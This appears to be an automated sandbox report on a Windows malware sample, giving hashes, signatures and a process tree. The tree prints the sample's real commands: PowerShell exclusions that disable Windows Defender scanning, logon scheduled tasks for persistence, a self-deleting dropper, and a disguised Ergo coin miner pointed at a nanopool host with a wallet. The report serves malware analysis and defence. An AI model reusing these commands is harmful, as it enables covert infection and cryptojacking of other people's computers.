Analysis
- max time kernel: 1s
- max time network: 101s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22/12/2023, 13:51

Static task: static1

Behavioral task: behavioral1
- Sample: af9721f9690603beffdb08ccb2b8196a.exe
- Resource: win7-20231215-en

Behavioral task: behavioral2
- Sample: af9721f9690603beffdb08ccb2b8196a.exe
- Resource: win10v2004-20231215-en
General
- Target: af9721f9690603beffdb08ccb2b8196a.exe
- Size: 12.9MB
- MD5: af9721f9690603beffdb08ccb2b8196a
- SHA1: f2531c0a5d3b3670c369c1b56c3d48ce9983cb46
- SHA256: 05346140fbd935a2bd11cdb627178453624d5c2556ce5d253bd1a35095eaf0c9
- SHA512: 8d7ce747f31e51fd218fe3faa5831a25de14f7df63b541938c8490f85d0f62800e0e2fb6190587bb20b23cbe3c70cd268f1ac133c3e79c3adf2d7da9582345c8
- SSDEEP: 393216:5BIVza8DRgTzJDmTcdUHWM2Yk/6MgkkZqL:LSJRgPJ8cdUvkyMZL
Malware Config
Signatures
- YARA rule match: vmprotect
  Matched memory dumps (resource | yara_rule):
  - behavioral2/memory/3816-86-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/3816-85-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/3064-128-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/3816-146-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/896-151-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/896-155-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/3064-166-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/2392-248-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/2392-252-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/5072-258-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/5072-262-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/3124-266-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/2172-274-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
  - behavioral2/memory/4628-282-0x0000000140000000-0x0000000141B3D000-memory.dmp | vmprotect
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Matched processes (pid | Process):
  - 1392 | schtasks.exe
  - 2536 | schtasks.exe
- Runs net.exe
Processes
Each entry lists PID | image path | command line; indentation shows the parent/child relationship, and signature hits are given in square brackets.

- PID 1768 | C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe | "C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"
  - PID 3768 | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | "C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"
    - PID 2248 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Windows\Winteste.bat" "
      - PID 1392 | C:\Windows\SysWOW64\schtasks.exe | schtasks /Create /XML C:\Windows\winserver.xml /tn winserver [Creates scheduled task(s)]
      - PID 2472 | C:\Windows\SysWOW64\net.exe | NET FILE
    - PID 3476 | C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"
      - PID 4348 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Windows\WNDR.bat" "
    - PID 3100 | C:\Windows\WindowsNote.exe | "C:\Windows\WindowsNote.exe"
- PID 2772 | C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 FILE
- PID 3816 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0
  - PID 3064 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 0
  - PID 896 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 1
  - PID 2392 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 2
  - PID 5072 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 3
  - PID 3124 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 4
  - PID 2172 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 5
  - PID 4628 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 6
  - PID 4688 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 7
  - PID 3408 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 8
  - PID 3920 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 9
  - PID 1852 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 10
  - PID 2560 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 11
  - PID 376 | C:\Windows\Windows.exe | Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 12
- PID 2732 | C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe | "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
  - PID 1796 | C:\Windows\SYSTEM32\cmd.exe | "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
    - PID 5016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
    - PID 1720 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
    - PID 3592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
  - PID 2196 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
- PID 2556 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
- PID 2536 | C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' [Creates scheduled task(s)]
- PID 1088 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
- PID 2320 | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
  - PID 4520 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
  - PID 1076 | C:\Windows\system32\services64.exe | "C:\Windows\system32\services64.exe"
- PID 1036 | C:\Windows\system32\choice.exe | choice /C Y /N /D Y /T 3
- PID 780 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
- PID 4028 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
- PID 3028 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
- PID 2896 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
- PID 4284 | C:\Windows\system32\cmd.exe | "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Network
MITRE ATT&CK Enterprise v15
Downloads